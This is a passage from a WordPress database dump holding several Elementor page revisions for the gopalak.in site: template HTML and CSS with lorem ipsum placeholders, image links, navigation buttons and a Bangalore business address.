.elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, </p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, </p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, </p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<h2>Add Your Heading Text Here</h2>		\n		<p><strong>Lorem Ipsum</strong> is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Know More\n					</a>\n			<h2>LATEST NEWS</h2>		\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\nContact : (+91)7259272171<br>\nE-mail id: mango@homedirect.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-09-30 11:24:58','2022-09-30 05:54:58','',1373,'https://gopalak.in/?p=1438',0,'revision','',0),(1439,1,'2022-09-30 11:24:58','2022-09-30 05:54:58','<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Add Your Heading Text Here</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, </p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, </p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, </p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<h2>Add Your Heading Text Here</h2>		\n		<p><strong>Lorem Ipsum</strong> is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Know More\n					</a>\n			<h2>LATEST NEWS</h2>		\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\nContact : (+91)7259272171<br>\nE-mail id: mango@homedirect.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-09-30 11:24:58','2022-09-30 05:54:58','',1373,'https://gopalak.in/?p=1439',0,'revision','',0),(1440,1,'2022-09-30 11:25:19','2022-09-30 05:55:19','<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Add Your Heading Text Here</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, </p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, </p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, </p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<h2>Add Your Heading Text Here</h2>		\n		<p><strong>Lorem Ipsum</strong> is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Know More\n					</a>\n			<h2>LATEST NEWS</h2>		\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\nContact : (+91)7259272171<br>\nE-mail id: mango@homedirect.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-09-30 11:25:19','2022-09-30 05:55:19','',1373,'https://gopalak.in/?p=1440',0,'revision','',0),(1441,1,'2022-09-30 11:25:19','2022-09-30 05:55:19','<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Add Your Heading Text Here</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, </p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, </p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, </p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<h2>Add Your Heading Text Here</h2>		\n		<p><strong>Lorem Ipsum</strong> is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Know More\n					</a>\n			<h2>LATEST NEWS</h2>		\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 